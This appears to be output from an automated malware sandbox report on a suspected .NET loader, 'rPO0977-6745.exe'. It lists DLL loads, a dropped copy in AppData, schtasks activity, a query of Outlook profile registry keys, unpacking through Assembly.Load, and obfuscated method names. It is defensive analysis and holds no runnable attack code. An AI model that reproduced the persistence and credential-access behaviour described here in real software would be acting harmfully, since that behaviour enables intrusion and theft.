Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\rPO0977-6745.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: rPO0977-6745.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: rPO0977-6745.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: rPO0977-6745.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ikFw.pdbSHA256 source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr
Source:	Binary string: ikFw.pdb source: rPO0977-6745.exe, EDyxAgkldisLe.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: rPO0977-6745.exe, Main.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: EDyxAgkldisLe.exe.0.dr, Main.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.7820000.5.raw.unpack, bg.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	.Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	.Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	.Net Code: UgIr7Bx3MP System.Reflection.Assembly.Load(byte[])
Source: 0.2.rPO0977-6745.exe.31b9118.0.raw.unpack, bg.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: rPO0977-6745.exe

Static PE information: 0x92C42B74 [Sat Jan 11 04:28:36 2048 UTC]

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_02F75DFF push esp; iretd	0_2_02F75E19
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D19060 push esp; ret	0_2_08D19061
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 0_2_08D16589 pushad ; retf	0_2_08D16595
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_014424B9 push 8BFFFFFFh; retf	10_2_014424BF
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBEC0E push es; iretd	10_2_06BBEC14
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBDA48 push es; ret	10_2_06BBEB88
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBEB92 push es; ret	10_2_06BBEB98
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Code function: 10_2_06BBEB8A push es; ret	10_2_06BBEB90
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_00D49C40 push 80028793h; iretd	11_2_00D49C6D
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 11_2_00D45DFF push esp; iretd	11_2_00D45E19
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_00E424B9 push 8BFFFFFFh; retf	23_2_00E424BF
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EEA62 push es; ret	23_2_064EEA68
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EEAFA push es; ret	23_2_064EEB00
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EEBFE push es; iretd	23_2_064EEC14
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EEB8E push es; ret	23_2_064EEB90
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Code function: 23_2_064EEB96 push es; ret	23_2_064EEB98

Source: rPO0977-6745.exe	Static PE information: section name: .text entropy: 7.966999305787785
Source: EDyxAgkldisLe.exe.0.dr	Static PE information: section name: .text entropy: 7.966999305787785

Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	High entropy of concatenated method names: 'UfeMUo5y1v', 'fQEMZfLQSe', 'YIWMwESRIb', 'nheM4SnoOo', 'P5rMi4FG1p', 'AfbM2SjWH8', 'w8xMBhpK1O', 'wurMgSnPeu', 'BfAMWPoF7S', 'wxIMX9FS9M'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, Dqkyhukd5DPEpWtsrk.cs	High entropy of concatenated method names: 'FXfHqnePF2', 'LJlHM8PTg9', 'KktHrtN9On', 'RIqHZ8tTmd', 'bVaHwKZMyw', 'PPKHiEt3nD', 'BDVH2o9gei', 'xxZxVXbO5M', 'I1txN1hGKZ', 'aZvxsqKfsL'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, hWtek0zyFhm6YOkDOc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kQDHK9kAKh', 'sZOHva20V4', 'gpsHP3E4I8', 'J7kHncWDan', 'fP5HxGWwAm', 'PqVHHiEdX4', 'jB1H8kEhmZ'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, TVHBd5rBSDSNtLCLLd.cs	High entropy of concatenated method names: 'kb349ddmYp', 'p3e4Fe62GZ', 'chD4kOZOyj', 'CG54dETV6i', 'UdI4vKn82q', 'Wav4PGVxjb', 'h674ntq847', 'f7x4xffHUW', 'k0V4Hi2k8B', 'kx648Q0hK3'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, YfsUVIwKwligCWwUFOb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bnG8cVygMs', 'AaN83wkcge', 'xQV8OlU5SW', 'Clo8ltPJPP', 'j5L85oHMOm', 'M8Z8SF35wQ', 'DUx8VhEvZH'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, G3Zlh9sDOA6l6Xdsx8.cs	High entropy of concatenated method names: 'DZbB68eDtN', 'w0VBEGkrX4', 'ba3B7STYAO', 'NAqB9yyHuo', 'Tq4BQrdWch', 'KdQBFbSOYQ', 'vhOBmSA7y9', 'NDYBkXFr9V', 'rBeBd9Np14', 'XdGBp89pF0'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, XiDiD0bdPoQPVP9xtF.cs	High entropy of concatenated method names: 'PTB7Xl8Lg', 'ptN9WtRRJ', 'G2mFTCeDL', 'YFsm0uZk2', 'lSMdlxQnw', 'beZpXF6HW', 'EXWH6qvOMkFXXn3QF0', 'MtdmsOXKmHeqvKSwkR', 'jyxx1IsVW', 'tYj8qDndC'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, unupZHtXVeGThL8D36.cs	High entropy of concatenated method names: 'Dispose', 'xSGqslOfB8', 'sZhfaKt1Ix', 'GX0GGnhRB4', 'vZmqIu1wMp', 'QIBqz63j3n', 'ProcessDialogKey', 'xIyfy6JAF8', 'I3VfqQ9noD', 'SsyffHPYUd'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, O5tYpwmEKrOLf39LE6.cs	High entropy of concatenated method names: 'XGvnXdHnFM', 'A63nAkM5Lu', 'ToString', 'qaynZbEA2J', 'VjXnw6glXQ', 'dTGn4maneN', 'bpvniOqZrg', 'Ug7n2NtHRf', 'VmUnBukOp5', 'KIxngT4Mct'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, H9cpRKwuIODiPO2dgX1.cs	High entropy of concatenated method names: 'sGrH6lKFlm', 'XBOHEqD2fL', 'PcCH7KSkKB', 'c1WH9Mj7Fp', 'ACpHQVtnFr', 'OF1HFXUT84', 'UQFHmDksYj', 'D4OHk6USwr', 'MpJHdMnRK7', 'NJgHpvPVEj'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, SuXDWccPOvK5odiT5e.cs	High entropy of concatenated method names: 'iK1nNKbibZ', 'K3UnIws6oG', 'BWCxy1I7S6', 'e7lxqMH53I', 'Ap4n11XsBE', 'xhKnbrZNaq', 'ggYnC1sfcd', 'RbTnc3k0wf', 'Xjvn3f3N1M', 'tpvnOmb4Ed'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, bJvLSL34IERm7aJscU.cs	High entropy of concatenated method names: 'wayKkZ9RBP', 'puvKdv7pUY', 'UuFKuNVxnF', 'PJ3KaXpo99', 'UfnKtrpiv4', 'anYKYMUZKX', 'N9FKD6oHoF', 'JpJKjnAsKb', 'QtPKhKQ3yp', 'bAKK1b5IUE'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, t2qt23C1ZO7pYQfAKA.cs	High entropy of concatenated method names: 'PFrwcuErRw', 'jaKw339Vro', 'yICwOV6ZQ0', 'C51wlfrQt8', 'U8Rw57yZaN', 'bFswSrFH55', 'dwHwVSZWNr', 'nHxwN4GSE1', 'EZZwsJWbfg', 'OxkwICvhvw'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, AqBlQbya8Vp6IS1UoE.cs	High entropy of concatenated method names: 'CIWvhRO41X', 'S6cvbOrMno', 'AmsvcXJCd1', 'Kf7v3tiAja', 'r0xvaUNTG0', 'OBhvJg0SQG', 'oBXvtp8SBS', 'h6wvYKekMn', 'jkbvTUORGv', 'DruvDPgK7o'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, J7ecEYjmNahUm7LApD.cs	High entropy of concatenated method names: 'X4VxZx5Xql', 'nxvxwIZkVL', 'Qlsx49wevp', 'GZmxiTVV7H', 'wAQx2VPGe7', 'kyGxBF2OVP', 'Aj5xgeT7vs', 'UHOxWSyBas', 'DIBxX1ZY6s', 'kpAxAA2By6'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, dlx18wvlGuFkC3sMg9.cs	High entropy of concatenated method names: 'zYR2UTS2kM', 'lad2whCgDl', 'Q5a2ixlUn7', 'jZN2BUe2CE', 'VcO2gCOmRM', 'Mhvi56u223', 'DI4iSLe1Sv', 'TPjiVLcja1', 's9HiN7ns9v', 'OUYisfV5c7'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, JdId2Rh2LV5U7y7cd7.cs	High entropy of concatenated method names: 'b7hBZDC5ef', 'FC7B47v3wV', 'EDnB2QITTR', 'REw2I3j10i', 'S8D2zyY9wH', 'BvYBy1E3f5', 'R0lBqL0XHb', 'K1EBf85cjC', 'higBMo5JZ1', 'CQMBrQejWu'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, xZ2HP9w52KJ9j9OhmHp.cs	High entropy of concatenated method names: 'j5OlLfGGYRY6v', 'FSRi4Xkureg2qrnOLtK', 'HbyZTtkrqlYbwyQYNrE', 'dejTo9kzXBlOLx6Fpan', 'fNjMQ3kcWsBLuycREpK', 'Ay37hjkZc54ugh41Gnm'
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, xLOmlk5E6U3TdCC4SP.cs	High entropy of concatenated method names: 'lf9qBSpsC5', 'fMiqgVSjJv', 'qHRqXAlLK4', 'zdeqAa451k', 'S1NqvTeapU', 'NxEqPdbByQ', 'c1TtPmNPclUlssDWLO', 'UX6XiLDvrYw6Mksvwp', 'sCuqqUySuJ', 'nxOqMyY6We'
